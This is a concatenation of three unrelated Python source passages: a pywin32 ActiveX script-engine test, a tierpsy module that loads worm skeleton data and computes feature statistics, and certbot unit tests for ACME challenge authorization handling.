axscript.SCRIPTSTATE_INITIALIZED: "SCRIPTSTATE_INITIALIZED",
axscript.SCRIPTSTATE_STARTED: "SCRIPTSTATE_STARTED",
axscript.SCRIPTSTATE_CONNECTED: "SCRIPTSTATE_CONNECTED",
axscript.SCRIPTSTATE_DISCONNECTED: "SCRIPTSTATE_DISCONNECTED",
axscript.SCRIPTSTATE_CLOSED: "SCRIPTSTATE_CLOSED",
}
def _CheckEngineState(engine, name, state):
got = engine.engine.eScript.GetScriptState()
if got != state:
got_name = state_map.get(got, str(got))
state_name = state_map.get(state, str(state))
raise RuntimeError("Warning - engine %s has state %s, but expected %s" % (name, got_name, state_name))
class EngineTester(win32com.test.util.TestCase):
    """Drives the VBScript/Python ActiveX script engines: runs code, calls
    into the script IDispatch and walks the engine state machine."""
    def _TestEngine(self, engineName, code, expected_exc = None):
        # Build a site exposing 'test', run ``code`` in the named engine and
        # (unless ``expected_exc`` fires) exercise the full state transitions.
        echoer = Test()
        model = {
            'test' : util.wrap(echoer),
            }
        site = MySite(model)
        engine = site._AddEngine(engineName)
        try:
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.AddCode(code)
            engine.Start()
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
            self.failUnless(not echoer.fail_called, "Fail should not have been called")
            # Now call into the scripts IDispatch
            ob = Dispatch(engine.GetScriptDispatch())
            try:
                ob.hello("Goober")
                self.failUnless(expected_exc is None,
                                "Expected %r, but no exception seen" % (expected_exc,))
            except pythoncom.com_error:
                if expected_exc is None:
                    self.fail("Unexpected failure from script code: %s" % (site.exception_seen,))
                if expected_exc not in site.exception_seen[2]:
                    self.fail("Could not find %r in %r" % (expected_exc, site.exception_seen[2]))
                return
            self.assertEqual(echoer.last, "Goober")
            self.assertEqual(str(ob.prop), "Property Value")
            ob.testcollection()
            self.failUnless(not echoer.fail_called, "Fail should not have been called")
            # Now make sure my engines can evaluate stuff.
            result = engine.eParse.ParseScriptText("1+1", None, None, None, 0, 0, axscript.SCRIPTTEXT_ISEXPRESSION)
            self.assertEqual(result, 2)
            # re-initialize to make sure it transitions back to initialized again.
            engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.Start()
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
            # Transition back to initialized, then through connected too.
            engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
            engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
            engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
            engine.SetScriptState(axscript.SCRIPTSTATE_DISCONNECTED)
            _CheckEngineState(site, engineName, axscript.SCRIPTSTATE_DISCONNECTED)
        finally:
            engine.Close()
            engine = None
            site = None
    def testVB(self):
        self._TestEngine("VBScript", VBScript)
    def testPython(self):
        self._TestEngine("Python", PyScript)
    def testPythonUnicodeError(self):
        # NOTE(review): runs the plain PyScript, identical to testPython --
        # it does not actually exercise a unicode error; confirm intent.
        self._TestEngine("Python", PyScript)
    def testVBExceptions(self):
        self.assertRaises(pythoncom.com_error,
                          self._TestEngine, "VBScript", ErrScript)
    def testPythonExceptions(self):
        # The \xa9 char checks extended-character handling in tracebacks.
        expected = u"RuntimeError: exc with extended \xa9har"
        self._TestEngine("Python", PyScript_Exc, expected)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 2 19:15:50 2017
@author: ajaver
"""
from tierpsy.analysis.stage_aligment.alignStageMotion import isGoodStageAligment, _h_get_stage_inv
from tierpsy.helper.params import read_fps, read_microns_per_pixel, read_ventral_side
from tierpsy import AUX_FILES_DIR
import tierpsy.features.open_worm_analysis_toolbox as mv
import copy
import numpy as np
import pandas as pd
import tables
import warnings
import os
from collections import OrderedDict
from scipy.signal import savgol_filter
# (http://www.pytables.org/usersguide/parameter_files.html)
# Raise PyTables' column limit so wide feature tables can be stored.
tables.parameters.MAX_COLUMNS = 1024
def _h_smooth_curve(curve, window=5, pol_degree=3):
'''smooth curves using the savgol_filter'''
if curve.shape[0] < window:
# nothing to do here return an empty array
return np.full_like(curve, np.nan)
# consider the case of one (widths) or two dimensions (skeletons, contours)
if curve.ndim == 1:
smoothed_curve = savgol_filter(curve, window, pol_degree)
else:
smoothed_curve = np.zeros_like(curve)
for nn in range(curve.ndim):
smoothed_curve[:, nn] = savgol_filter(
curve[:, nn], window, pol_degree)
return smoothed_curve
def _h_smooth_curve_all(curves, window=5, pol_degree=3):
    """Smooth every row of ``curves`` in place, skipping rows containing NaNs."""
    for idx, curve in enumerate(curves):
        if np.any(np.isnan(curve)):
            continue
        curves[idx] = _h_smooth_curve(curve, window=window,
                                      pol_degree=pol_degree)
    return curves
class WormFromTableSimple():
    """Read one worm's skeleton/contour/width data from a tierpsy HDF5 file.

    Arrays are laid out on a contiguous timestamp axis (frames without a
    valid skeleton are NaN) and converted to microns via the file's
    calibration.
    """
    def __init__(self,
                 file_name,
                 worm_index,
                 use_skel_filter=True,
                 worm_index_type='worm_index_joined',
                 smooth_window=-1,
                 POL_DEGREE_DFLT=3):
        # Populates an empty normalized worm.
        #if it does not exists return 1 as a default, like that we can still calculate the features in pixels and frames, instead of micrometers and seconds.
        self.microns_per_pixel = read_microns_per_pixel(file_name, dflt=1)
        self.fps = read_fps(file_name, dflt=1)
        # savitzky-golay filter polynomial order default
        self.POL_DEGREE_DFLT = POL_DEGREE_DFLT
        # save the input parameters
        self.file_name = file_name
        self.worm_index = worm_index
        self.use_skel_filter = use_skel_filter
        self.worm_index_type = worm_index_type
        # set to less than POL_DEGREE_DFLT to eliminate smoothing
        self.smooth_window = smooth_window
        # smooth window must be an odd number larger than the polynomial degree
        # (savitzky-golay filter requirement)
        if self.smooth_window >= self.POL_DEGREE_DFLT and self.smooth_window % 2 == 0:
            self.smooth_window += 1
        self.ventral_side = 'unknown'
        self._h_read_data()
        # smooth data if required
        if self.smooth_window > self.POL_DEGREE_DFLT:
            # print('Smoothing...')
            self.skeleton = _h_smooth_curve_all(
                self.skeleton, window=self.smooth_window)
            self.widths = _h_smooth_curve_all(
                self.widths, window=self.smooth_window)
        # assert the dimenssions of the read data are correct
        self._h_assert_data_dim()

    def _h_get_table_indexes(self):
        '''
        Get the relevant info from the trajectory_data table for a single worm. skeleton_id, timestamp.
        '''
        # intialize just to make clear the relevant variables for this function
        with pd.HDFStore(self.file_name, 'r') as ske_file_id:
            trajectories_data_f = ske_file_id['/trajectories_data']
            # get the rows of valid skeletons
            assert self.worm_index_type in trajectories_data_f
            good = trajectories_data_f[self.worm_index_type] == self.worm_index
            trajectories_data = trajectories_data_f.loc[good]
            try:
                # try to read the time stamps, if there are repeated or not a
                # number use the frame nuber instead
                timestamp_raw = trajectories_data['timestamp_raw'].values
                if np.any(np.isnan(timestamp_raw)):
                    raise ValueError
                else:
                    # BUG FIX: np.int was removed from NumPy; the builtin
                    # int is the equivalent platform integer here.
                    timestamp_inds = timestamp_raw.astype(int)
                    #deal in the case they are repeating indexes (this happends sometimes in the last frame)
                    timestamp_inds, ind = np.unique(timestamp_inds, return_index=True)
                    trajectories_data = trajectories_data.iloc[ind]
            except (ValueError, KeyError):
                # if the time stamp fails use the frame_number value instead
                # (the index of the mask) and return nan as the fps
                timestamp_inds = trajectories_data['frame_number'].values
            skel_table_id = trajectories_data['skeleton_id'].values
            # we need to use (.values) to be able to use the & operator
            good_skeletons = (trajectories_data['has_skeleton'] == 1).values
            if self.use_skel_filter and 'is_good_skel' in trajectories_data:
                # only keep skeletons that where labeled as good skeletons in
                # the filtering step
                good_skeletons &= (
                    trajectories_data['is_good_skel'] == 1).values
            skel_table_id = skel_table_id[good_skeletons]
            timestamp_inds = timestamp_inds[good_skeletons]
            return skel_table_id, timestamp_inds

    def _h_read_data(self):
        """Allocate NaN-padded arrays on the timestamp axis and fill them
        from the skeleton/contour tables (converted to microns)."""
        skel_table_id, timestamp_inds = self._h_get_table_indexes()
        if not np.array_equal(np.sort(timestamp_inds), timestamp_inds): #the time stamp must be sorted
            warnings.warn('{}: The timestamp is not sorted in worm_index {}'.format(self.file_name, self.worm_index))
        # use real frames to define the size of the object arrays
        first_frame = np.min(timestamp_inds)
        last_frame = np.max(timestamp_inds)
        n_frames = last_frame - first_frame + 1
        # get the apropiate index in the object array
        ind_ff = timestamp_inds - first_frame
        # get the number of segments from the normalized skeleton
        with tables.File(self.file_name, 'r') as ske_file_id:
            self.n_segments = ske_file_id.get_node('/skeleton').shape[1]
        # add the data from the skeleton_id's and timestamps used
        self.timestamp = np.arange(first_frame, last_frame + 1)
        self.skeleton_id = np.full(n_frames, -1, np.int32)
        self.skeleton_id[ind_ff] = skel_table_id
        # initialize the rest of the arrays
        self.skeleton = np.full((n_frames, self.n_segments, 2), np.nan)
        self.ventral_contour = np.full((n_frames, self.n_segments, 2), np.nan)
        self.dorsal_contour = np.full((n_frames, self.n_segments, 2), np.nan)
        self.widths = np.full((n_frames, self.n_segments), np.nan)
        # read data from the skeletons table
        with tables.File(self.file_name, 'r') as ske_file_id:
            self.skeleton[ind_ff] = \
                ske_file_id.get_node('/skeleton')[skel_table_id, :, :] * self.microns_per_pixel
            self.ventral_contour[ind_ff] = \
                ske_file_id.get_node('/contour_side1')[skel_table_id, :, :] * self.microns_per_pixel
            self.dorsal_contour[ind_ff] = \
                ske_file_id.get_node('/contour_side2')[skel_table_id, :, :] * self.microns_per_pixel
            self.widths[ind_ff] = \
                ske_file_id.get_node('/contour_width')[skel_table_id, :] * self.microns_per_pixel

    def _h_assert_data_dim(self):
        # assertions to check the data has the proper dimensions
        fields2check = [
            'skeleton',
            'widths',
            'ventral_contour',
            'dorsal_contour']
        for field in fields2check:
            A = getattr(self, field)
            assert A.shape[0] == self.n_frames
            if A.ndim >= 2:
                assert A.shape[1] == self.n_segments
            if A.ndim == 3:
                assert A.shape[2] == 2

    @property
    def n_valid_skel(self):
        # calculate the number of valid skeletons
        return np.sum(~np.isnan(self.skeleton[:, 0, 0]))

    @property
    def n_frames(self):
        # total frames spanned by the (contiguous) timestamp axis
        return self.timestamp.size

    @property
    def last_frame(self):
        return self.timestamp[-1]

    @property
    def first_frame(self):
        return self.timestamp[0]
class WormFromTable(WormFromTableSimple):
    """WormFromTableSimple plus splitting, open-worm conversion and the
    Schafer-lab stage-motion correction."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def split(self, split_size):
        '''subdivide so I do not have to start at the begining of a trajectory
        (it is more likely that there was an error here)
        '''
        remainder = self.n_frames % split_size
        if remainder == 0:
            ini_split = split_size
        else:
            ini_split = remainder//2
        #get the indexes to made the splits
        # BUG FIX: np.int was removed from NumPy; use the builtin int.
        split_ind = np.arange(ini_split, self.n_frames, split_size, dtype=int)
        n_splits = split_ind.size + 1
        #get the fields that will be splitted, they should be ndarrays with the same number of elements in the fisrt dimension
        fields2split = [field for field, val in self.__dict__.items() if isinstance(val, np.ndarray)]
        # check all the fields have the same number of frames in the first dimension
        # BUG FIX: the old assert only checked shape[0] was non-zero; compare
        # against n_frames as the comment intends.
        assert all(getattr(self, x).shape[0] == self.n_frames for x in fields2split)
        #copy the main object to initialize the smaller trajectories
        base_worm =copy.copy(self)
        #delete the ndarray fields so we don't copy large amount of data twice
        [setattr(base_worm, x, np.nan) for x in fields2split]
        #split each fields
        splitted_worms = [copy.copy(base_worm) for n in range(n_splits)]
        for field in fields2split:
            splitted_field = np.split(getattr(self, field), split_ind, axis=0)
            for worm_s, dat_s in zip(splitted_worms, splitted_field):
                setattr(worm_s, field, dat_s)
        return splitted_worms

    def to_open_worm(self):
        '''
        Return a NormalizedWorm object compatible with the openworm toolbox
        '''
        def _chage_axis(x):
            # open-worm expects the time axis last, fortran-ordered
            A = np.rollaxis(x, 0, x.ndim)
            return np.asfortranarray(A)
        fields = [
            'skeleton',
            'widths',
            'ventral_contour',
            'dorsal_contour']
        args = [_chage_axis(getattr(self, ff)) for ff in fields]
        nw = mv.NormalizedWorm.from_normalized_array_factory(*args)
        nw.video_info.fps = self.fps
        nw.video_info.set_ventral_mode(self.ventral_side)
        if nw.video_info.ventral_mode != 0:
            #check that the contour orientation and the ventral_mode are the same
            signed_a = nw.signed_area[np.argmax(~np.isnan(nw.signed_area))] #first element not nan
            if signed_a < 0:
                assert nw.video_info.ventral_mode == 2 #anticlockwise
            else:
                assert nw.video_info.ventral_mode == 1
        return nw

    def correct_schafer_worm(self):
        """Shift coordinates by the inverse stage motion and NaN-out frames
        where the stage was moving (idempotent via the stage_vec_inv guard)."""
        if hasattr(self, 'stage_vec_inv'):
            print('The worm has been previously corrected. The attribute "stage_vec_inv" exists. ')
            return
        self.ventral_side = read_ventral_side(self.file_name)
        assert isGoodStageAligment(self.file_name)
        self.stage_vec_inv, _ = _h_get_stage_inv(self.file_name, self.timestamp)
        #remove data where the stage is moving (the blurred image can induce artifacts)
        self.is_stage_move = np.isnan(self.stage_vec_inv[:,0])
        self.widths[self.is_stage_move, :] = np.nan
        for field in ['skeleton', 'ventral_contour', 'dorsal_contour']:
            if hasattr(self, field):
                tmp_dat = getattr(self, field)
                # rotate the skeletons
                # for ii in range(tot_skel):
                #tmp_dat[ii] = np.dot(rotation_matrix, tmp_dat[ii].T).T
                tmp_dat = tmp_dat + self.stage_vec_inv[:, np.newaxis, :]
                setattr(self, field, tmp_dat)
class WormStats():
    def __init__(self):
        '''get the info for each feature chategory'''
        # CSV shipped with tierpsy describing each feature (signedness,
        # whether it is a time series, open-worm object name, ...).
        feat_names_file = os.path.join(AUX_FILES_DIR, 'features_names.csv')
        #feat_names_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'aux', 'features_names.csv')
        self.extra_fields = ['worm_index', 'n_frames', 'n_valid_skel', 'first_frame']
        self.features_info = pd.read_csv(feat_names_file, index_col=0)
        self.builtFeatAvgNames()  # create self.feat_avg_names
        # get files that would be used in the construction of objects
        self.feat_avg_dtype = [(x, np.float32) for x in self.feat_avg_names]
        # names of the features that are time series
        self.feat_timeseries = list(
            self.features_info[
                self.features_info['is_time_series'] == 1].index.values)
        extra_fields = ['worm_index', 'timestamp', 'skeleton_id', 'motion_modes']
        timeseries_fields = extra_fields + self.feat_timeseries
        self.feat_timeseries_dtype = [(x, np.float32) for x in timeseries_fields]
        # names of the event-style (non time series) features
        self.feat_events = list(
            self.features_info[
                self.features_info['is_time_series'] == 0].index.values)
def builtFeatAvgNames(self):
feat_avg_names = self.extra_fields[:]
for feat_name, feat_info in self.features_info.iterrows():
motion_types = ['']
if feat_info['is_time_series']:
motion_types += ['_forward', '_paused', '_backward']
for mtype in motion_types:
sub_name = feat_name + mtype
feat_avg_names.append(sub_name)
if feat_info['is_signed']:
for atype in ['_abs', '_neg', '_pos']:
feat_avg_names.append(sub_name + atype)
self.feat_avg_names = feat_avg_names
def getFieldData(worm_features, name):
data = worm_features
for field in name.split('.'):
data = getattr(data, field)
return data
    def getWormStats(self, worm_features, stat_func=np.mean):
        ''' Calculate the statistics of an object worm features, subdividing data
        into Backward/Forward/Paused and/or Positive/Negative/Absolute, when appropiated.
        The default is to calculate the mean value, but this can be changed
        using stat_func.
        Return the feature list as an ordered dictionary.
        '''
        # ``worm_features`` may be a plain dict/DataFrame of feature arrays,
        # or an open-worm features object exposing ``_features``.
        if isinstance(worm_features, (dict, pd.DataFrame)):
            def read_feat(feat_name):
                if feat_name in worm_features:
                    return worm_features[feat_name]
                else:
                    return None
            motion_mode = read_feat('motion_modes')
        else:
            def read_feat(feat_name):
                # translate our feature name to the open-worm object's name
                feat_obj = self.features_info.loc[feat_name, 'feat_name_obj']
                if feat_obj in worm_features._features:
                    return worm_features._features[feat_obj].value
                else:
                    return None
            motion_mode = worm_features._features['locomotion.motion_mode'].value
        # return data as a numpy recarray
        feat_stats = np.full(1, np.nan, dtype=self.feat_avg_dtype)
        for feat_name, feat_props in self.features_info.iterrows():
            tmp_data = read_feat(feat_name)
            if tmp_data is None:
                feat_stats[feat_name] = np.nan
            elif isinstance(tmp_data, (int, float)):
                # scalar feature: store directly
                feat_stats[feat_name] = tmp_data
            else:
                # array feature: compute the subdivided statistics
                feat_avg = self._featureStat(
                    stat_func,
                    tmp_data,
                    feat_name,
                    feat_props['is_signed'],
                    feat_props['is_time_series'],
                    motion_mode)
                for feat_avg_name in feat_avg:
                    feat_stats[feat_avg_name] = feat_avg[feat_avg_name]
        return feat_stats
@staticmethod
def _featureStat(
stat_func,
data,
name,
is_signed,
is_time_series,
motion_mode=np.zeros(0)):
# I prefer to keep this function quite independend and pass the stats and moition_mode argument
# rather than save those values in the class
if data is None:
data = np.zeros(0)
#filter nan data
valid = ~np.isnan(data)
data = data[valid]
motion_types = OrderedDict()
motion_types['all'] = np.nan
if is_time_series:
# if the the feature is motion type we can subdivide in Forward,
# Paused or Backward motion
motion_mode = motion_mode[valid]
assert motion_mode.size == data.size
motion_types['forward'] = motion_mode == 1
motion_types['paused'] = motion_mode == 0
motion_types['backward'] = motion_mode == -1
stats = OrderedDict()
for key in motion_types:
if key == 'all':
sub_name = name
valid_data = data
else:
sub_name = name + '_' + key
#filter by an specific motion type
valid_data = data[motion_types[key]]
assert not np.any(np.isnan(valid_data))
stats[sub_name] = stat_func(valid_data)
if is_signed:
# if the feature is signed we can subdivide in positive,
# negative and absolute
stats[sub_name + '_abs'] = stat_func(np.abs(valid_data))
neg_valid = (valid_data < 0)
stats[sub_name + '_neg'] = stat_func(valid_data[neg_valid])
pos_valid = (valid_data > 0)
stats[sub_name + '_pos'] = stat_func(valid_data[pos_valid])
return stats
if __name__ == '__main__':
    # Ad-hoc manual smoke test: load a sample skeletons file from a developer
    # machine path and construct a worm object from it.
    main_dir = '/Users/ajaver/OneDrive - Imperial College London/Local_Videos/single_worm/global_sample_v3/'
    base_name = 'N2 on food R_2011_09_13__11_59___3___3'
    skel_file = os.path.join(main_dir, base_name + '_skeletons.hdf5')
    worm = WormFromTable(skel_file, 1)
|
|
"""Tests for certbot.auth_handler."""
import functools
import logging
import unittest
import mock
from acme import challenges
from acme import client as acme_client
from acme import messages
from certbot import achallenges
from certbot import errors
from certbot import le_util
from certbot.tests import acme_util
class ChallengeFactoryTest(unittest.TestCase):
    # pylint: disable=protected-access
    """Tests for AuthHandler._challenge_factory."""

    def setUp(self):
        from certbot.auth_handler import AuthHandler

        # Account is mocked...
        self.handler = AuthHandler(None, None, mock.Mock(key="mock_key"))

        self.dom = "test"
        # One pending authorization holding every supported challenge type.
        self.handler.authzr[self.dom] = acme_util.gen_authzr(
            messages.STATUS_PENDING, self.dom, acme_util.CHALLENGES,
            [messages.STATUS_PENDING] * 6, False)

    def test_all(self):
        # Requesting every index yields every challenge, in order.
        achalls = self.handler._challenge_factory(
            self.dom, range(0, len(acme_util.CHALLENGES)))

        self.assertEqual(
            [achall.chall for achall in achalls], acme_util.CHALLENGES)

    def test_one_tls_sni(self):
        achalls = self.handler._challenge_factory(self.dom, [1])

        self.assertEqual(
            [achall.chall for achall in achalls], [acme_util.TLSSNI01])

    def test_unrecognized(self):
        # An unknown challenge type must raise rather than be silently skipped.
        self.handler.authzr["failure.com"] = acme_util.gen_authzr(
            messages.STATUS_PENDING, "failure.com",
            [mock.Mock(chall="chall", typ="unrecognized")],
            [messages.STATUS_PENDING])

        self.assertRaises(
            errors.Error, self.handler._challenge_factory, "failure.com", [0])
class GetAuthorizationsTest(unittest.TestCase):
    """get_authorizations test.

    This tests everything except for all functions under _poll_challenges.
    """

    def setUp(self):
        from certbot.auth_handler import AuthHandler

        self.mock_auth = mock.MagicMock(name="ApacheConfigurator")
        # The authenticator prefers TLS-SNI-01 and simply echoes back the
        # challenges it is asked to perform.
        self.mock_auth.get_chall_pref.return_value = [challenges.TLSSNI01]
        self.mock_auth.perform.side_effect = gen_auth_resp

        self.mock_account = mock.Mock(key=le_util.Key("file_path", "PEM"))
        self.mock_net = mock.MagicMock(spec=acme_client.Client)

        self.handler = AuthHandler(
            self.mock_auth, self.mock_net, self.mock_account)

        logging.disable(logging.CRITICAL)

    def tearDown(self):
        logging.disable(logging.NOTSET)

    @mock.patch("certbot.auth_handler.AuthHandler._poll_challenges")
    def test_name1_tls_sni_01_1(self, mock_poll):
        self.mock_net.request_domain_challenges.side_effect = functools.partial(
            gen_dom_authzr, challs=acme_util.CHALLENGES)
        mock_poll.side_effect = self._validate_all

        authzr = self.handler.get_authorizations(["0"])

        self.assertEqual(self.mock_net.answer_challenge.call_count, 1)

        self.assertEqual(mock_poll.call_count, 1)
        chall_update = mock_poll.call_args[0][0]
        # Wrap .keys() in list() so this also passes on Python 3, where
        # dict.keys() returns a view object that never compares equal to a
        # list (harmless on Python 2).
        self.assertEqual(list(chall_update.keys()), ["0"])
        self.assertEqual(len(chall_update.values()), 1)

        self.assertEqual(self.mock_auth.cleanup.call_count, 1)
        # Test if list first element is TLSSNI01, use typ because it is an achall
        self.assertEqual(
            self.mock_auth.cleanup.call_args[0][0][0].typ, "tls-sni-01")
        self.assertEqual(len(authzr), 1)

    @mock.patch("certbot.auth_handler.AuthHandler._poll_challenges")
    def test_name1_tls_sni_01_1_http_01_1_dns_1(self, mock_poll):
        self.mock_net.request_domain_challenges.side_effect = functools.partial(
            gen_dom_authzr, challs=acme_util.CHALLENGES, combos=False)
        mock_poll.side_effect = self._validate_all
        self.mock_auth.get_chall_pref.return_value.append(challenges.HTTP01)
        self.mock_auth.get_chall_pref.return_value.append(challenges.DNS)

        authzr = self.handler.get_authorizations(["0"])

        # Without combinations, all three preferred challenges are answered.
        self.assertEqual(self.mock_net.answer_challenge.call_count, 3)

        self.assertEqual(mock_poll.call_count, 1)
        chall_update = mock_poll.call_args[0][0]
        # list() for Python 3 compatibility; see test_name1_tls_sni_01_1.
        self.assertEqual(list(chall_update.keys()), ["0"])
        self.assertEqual(len(chall_update.values()), 1)

        self.assertEqual(self.mock_auth.cleanup.call_count, 1)
        # Test if list first element is TLSSNI01, use typ because it is an achall
        for achall in self.mock_auth.cleanup.call_args[0][0]:
            self.assertTrue(achall.typ in ["tls-sni-01", "http-01", "dns"])

        # Length of authorizations list
        self.assertEqual(len(authzr), 1)

    @mock.patch("certbot.auth_handler.AuthHandler._poll_challenges")
    def test_name3_tls_sni_01_3(self, mock_poll):
        self.mock_net.request_domain_challenges.side_effect = functools.partial(
            gen_dom_authzr, challs=acme_util.CHALLENGES)
        mock_poll.side_effect = self._validate_all

        authzr = self.handler.get_authorizations(["0", "1", "2"])

        self.assertEqual(self.mock_net.answer_challenge.call_count, 3)

        # Check poll call
        self.assertEqual(mock_poll.call_count, 1)
        chall_update = mock_poll.call_args[0][0]
        self.assertEqual(len(chall_update.keys()), 3)
        self.assertTrue("0" in chall_update.keys())
        self.assertEqual(len(chall_update["0"]), 1)
        self.assertTrue("1" in chall_update.keys())
        self.assertEqual(len(chall_update["1"]), 1)
        self.assertTrue("2" in chall_update.keys())
        self.assertEqual(len(chall_update["2"]), 1)

        self.assertEqual(self.mock_auth.cleanup.call_count, 1)

        self.assertEqual(len(authzr), 3)

    def test_perform_failure(self):
        self.mock_net.request_domain_challenges.side_effect = functools.partial(
            gen_dom_authzr, challs=acme_util.CHALLENGES)
        self.mock_auth.perform.side_effect = errors.AuthorizationError

        self.assertRaises(
            errors.AuthorizationError, self.handler.get_authorizations, ["0"])

    def test_no_domains(self):
        self.assertRaises(errors.AuthorizationError, self.handler.get_authorizations, [])

    def _validate_all(self, unused_1, unused_2):
        # Flip every pending authorization (and all its challenges) to VALID,
        # simulating a successful poll.
        for dom in self.handler.authzr.keys():
            azr = self.handler.authzr[dom]
            self.handler.authzr[dom] = acme_util.gen_authzr(
                messages.STATUS_VALID,
                dom,
                [challb.chall for challb in azr.body.challenges],
                [messages.STATUS_VALID] * len(azr.body.challenges),
                azr.body.combinations)
class PollChallengesTest(unittest.TestCase):
    # pylint: disable=protected-access
    """Test poll challenges."""

    def setUp(self):
        from certbot.auth_handler import challb_to_achall
        from certbot.auth_handler import AuthHandler

        # Account and network are mocked...
        self.mock_net = mock.MagicMock()
        self.handler = AuthHandler(
            None, self.mock_net, mock.Mock(key="mock_key"))

        # Three pending authorizations: one with two challenges, two with the
        # full challenge set.
        self.doms = ["0", "1", "2"]
        self.handler.authzr[self.doms[0]] = acme_util.gen_authzr(
            messages.STATUS_PENDING, self.doms[0],
            [acme_util.HTTP01, acme_util.TLSSNI01],
            [messages.STATUS_PENDING] * 2, False)

        self.handler.authzr[self.doms[1]] = acme_util.gen_authzr(
            messages.STATUS_PENDING, self.doms[1],
            acme_util.CHALLENGES, [messages.STATUS_PENDING] * 3, False)

        self.handler.authzr[self.doms[2]] = acme_util.gen_authzr(
            messages.STATUS_PENDING, self.doms[2],
            acme_util.CHALLENGES, [messages.STATUS_PENDING] * 3, False)

        # Map each domain to annotated versions of its challenges, as
        # _poll_challenges expects.
        self.chall_update = {}
        for dom in self.doms:
            self.chall_update[dom] = [
                challb_to_achall(challb, mock.Mock(key="dummy_key"), dom)
                for challb in self.handler.authzr[dom].body.challenges]

    @mock.patch("certbot.auth_handler.time")
    def test_poll_challenges(self, unused_mock_time):
        # Each poll validates one challenge; eventually all authzrs are VALID.
        self.mock_net.poll.side_effect = self._mock_poll_solve_one_valid
        self.handler._poll_challenges(self.chall_update, False)

        for authzr in self.handler.authzr.values():
            self.assertEqual(authzr.body.status, messages.STATUS_VALID)

    @mock.patch("certbot.auth_handler.time")
    def test_poll_challenges_failure_best_effort(self, unused_mock_time):
        # best_effort=True: failures are tolerated, authzrs stay PENDING.
        self.mock_net.poll.side_effect = self._mock_poll_solve_one_invalid
        self.handler._poll_challenges(self.chall_update, True)

        for authzr in self.handler.authzr.values():
            self.assertEqual(authzr.body.status, messages.STATUS_PENDING)

    @mock.patch("certbot.auth_handler.time")
    @mock.patch("certbot.auth_handler.zope.component.getUtility")
    def test_poll_challenges_failure(self, unused_mock_time, unused_mock_zope):
        # best_effort=False: an invalid challenge raises AuthorizationError.
        self.mock_net.poll.side_effect = self._mock_poll_solve_one_invalid
        self.assertRaises(
            errors.AuthorizationError, self.handler._poll_challenges,
            self.chall_update, False)

    @mock.patch("certbot.auth_handler.time")
    def test_unable_to_find_challenge_status(self, unused_mock_time):
        from certbot.auth_handler import challb_to_achall
        self.mock_net.poll.side_effect = self._mock_poll_solve_one_valid
        # Add a challenge that is not part of any stored authzr, so its
        # status can never be found.
        self.chall_update[self.doms[0]].append(
            challb_to_achall(acme_util.DNS_P, "key", self.doms[0]))
        self.assertRaises(
            errors.AuthorizationError, self.handler._poll_challenges,
            self.chall_update, False)

    def test_verify_authzr_failure(self):
        # All authzrs are still PENDING, so verification must fail.
        self.assertRaises(
            errors.AuthorizationError, self.handler.verify_authzr_complete)

    def _mock_poll_solve_one_valid(self, authzr):
        # Pending here because my dummy script won't change the full status.
        # Basically it didn't raise an error and it stopped earlier than
        # Making all challenges invalid which would make mock_poll_solve_one
        # change authzr to invalid
        return self._mock_poll_solve_one_chall(authzr, messages.STATUS_VALID)

    def _mock_poll_solve_one_invalid(self, authzr):
        return self._mock_poll_solve_one_chall(authzr, messages.STATUS_INVALID)

    def _mock_poll_solve_one_chall(self, authzr, desired_status):
        # pylint: disable=no-self-use
        """Dummy method that solves one chall at a time to desired_status.

        When all are solved.. it changes authzr.status to desired_status

        """
        new_challbs = authzr.body.challenges
        # Move exactly one not-yet-solved challenge to desired_status.
        for challb in authzr.body.challenges:
            if challb.status != desired_status:
                new_challbs = tuple(
                    challb_temp if challb_temp != challb
                    else acme_util.chall_to_challb(challb.chall, desired_status)
                    for challb_temp in authzr.body.challenges
                )
                break

        # Only once every challenge reached desired_status does the whole
        # authorization adopt it.
        if all(test_challb.status == desired_status
               for test_challb in new_challbs):
            status_ = desired_status
        else:
            status_ = authzr.body.status

        new_authzr = messages.AuthorizationResource(
            uri=authzr.uri,
            new_cert_uri=authzr.new_cert_uri,
            body=messages.Authorization(
                identifier=authzr.body.identifier,
                challenges=new_challbs,
                combinations=authzr.body.combinations,
                status=status_,
            ),
        )
        return (new_authzr, "response")
class ChallbToAchallTest(unittest.TestCase):
    """Tests for certbot.auth_handler.challb_to_achall."""

    def _call(self, challb):
        # Import inside the helper so an import failure surfaces per-test.
        from certbot.auth_handler import challb_to_achall
        return challb_to_achall(challb, "account_key", "domain")

    def test_it(self):
        expected = achallenges.KeyAuthorizationAnnotatedChallenge(
            challb=acme_util.HTTP01_P,
            account_key="account_key",
            domain="domain")
        self.assertEqual(self._call(acme_util.HTTP01_P), expected)
class GenChallengePathTest(unittest.TestCase):
"""Tests for certbot.auth_handler.gen_challenge_path.
.. todo:: Add more tests for dumb_path... depending on what we want to do.
"""
def setUp(self):
logging.disable(logging.fatal)
def tearDown(self):
logging.disable(logging.NOTSET)
@classmethod
def _call(cls, challbs, preferences, combinations):
from certbot.auth_handler import gen_challenge_path
return gen_challenge_path(challbs, preferences, combinations)
def test_common_case(self):
"""Given TLSSNI01 and HTTP01 with appropriate combos."""
challbs = (acme_util.TLSSNI01_P, acme_util.HTTP01_P)
prefs = [challenges.TLSSNI01, challenges.HTTP01]
combos = ((0,), (1,))
# Smart then trivial dumb path test
self.assertEqual(self._call(challbs, prefs, combos), (0,))
